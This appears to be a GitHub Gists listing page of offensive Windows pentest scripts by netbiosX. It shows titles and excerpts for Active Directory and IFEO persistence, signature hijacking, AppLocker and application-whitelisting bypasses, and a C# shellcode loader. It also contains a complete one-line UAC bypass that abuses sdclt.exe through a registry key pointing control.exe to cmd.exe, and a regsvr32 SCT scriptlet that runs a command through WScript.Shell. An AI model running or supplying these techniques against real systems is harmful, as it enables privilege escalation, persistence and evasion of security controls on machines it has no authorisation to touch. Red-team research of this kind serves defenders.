netbiosX netbiosX
netbiosX / userAccountControl.ps1
Created Jan 17, 2022
PowerShell script to automate domain persistence via the userAccountControl Active Directory attribute.
View userAccountControl.ps1
function Execute-userAccountControl
[System.String]$DomainFQDN = $ENV:USERDNSDOMAIN,
[System.String]$ComputerName = 'Pentestlab',
[System.String]$OSVersion = '10.0 (18363)',
[System.String]$OS = 'Windows 10 Enterprise',
[System.String]$DNSName = "$ComputerName.$DomainFQDN",
netbiosX / ImageFileExecutionOptions.ps1
Last active Apr 25, 2022
Image File Execution Options Injection - Persistence Technique
View ImageFileExecutionOptions.ps1
ImageFileExecutionOptions v1.0
License: GPLv3
Author: @netbiosX
# Image File Execution Options Injection Persistence Technique
function Persist-Debugger
netbiosX / pentestlab-dll.inf
Created May 7, 2018
CMSTP - Arbitrary DLL execution locally and remotely and SCT for AppLocker Bypass
View pentestlab-dll.inf
netbiosX / DigitalSignature-Hijack.ps1
Last active Apr 2, 2021
Hijack Digital Signatures and Bypass Authenticode Hash Validation
View DigitalSignature-Hijack.ps1
DigitalSignatureHijack v1.0
License: GPLv3
Author: @netbiosX
# Validate Digital Signature for PowerShell Scripts
function ValidateSignaturePS
$ValidateHashFunc = 'HKLM:\SOFTWARE\Microsoft\Cryptography' +'\OID\EncodingType 0\CryptSIPDllVerifyIndirectData'
netbiosX / customers.xml
Created Jul 5, 2017
Bypass Application Whitelisting via msxsl binary
View customers.xml
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
netbiosX / Sdclt.ps1
Last active May 11, 2021
Bypass UAC via sdclt in Windows 10 systems
View Sdclt.ps1
This script can bypass User Account Control (UAC) via sdclt.exe for Windows 10.
Author: @netbiosX
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
It creates a registry key in: "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" to perform UAC bypass
netbiosX / sdclt.bat
Created Jun 9, 2017
UAC Bypass in Windows 10 via sdclt - batch version
View sdclt.bat
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "C:\Windows\System32\cmd.exe" /f && START /W C:\Windows\System32\sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
netbiosX / FodhelperUACBypass.ps1
Last active Aug 3, 2022
Bypass UAC via Fodhelper binary in Windows 10 systems
View FodhelperUACBypass.ps1
This script can bypass User Account Control (UAC) via fodhelper.exe
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
netbiosX / Shellcode.cs
Created Jun 6, 2017
C# file that contains shellcode and bypasses AppLocker via Assembly Load
View Shellcode.cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
netbiosX / pentestlab.sct
Created May 10, 2017
AppLocker - Regsvr32
View pentestlab.sct
<?XML version="1.0"?>
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - @netbiosX -->
<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe");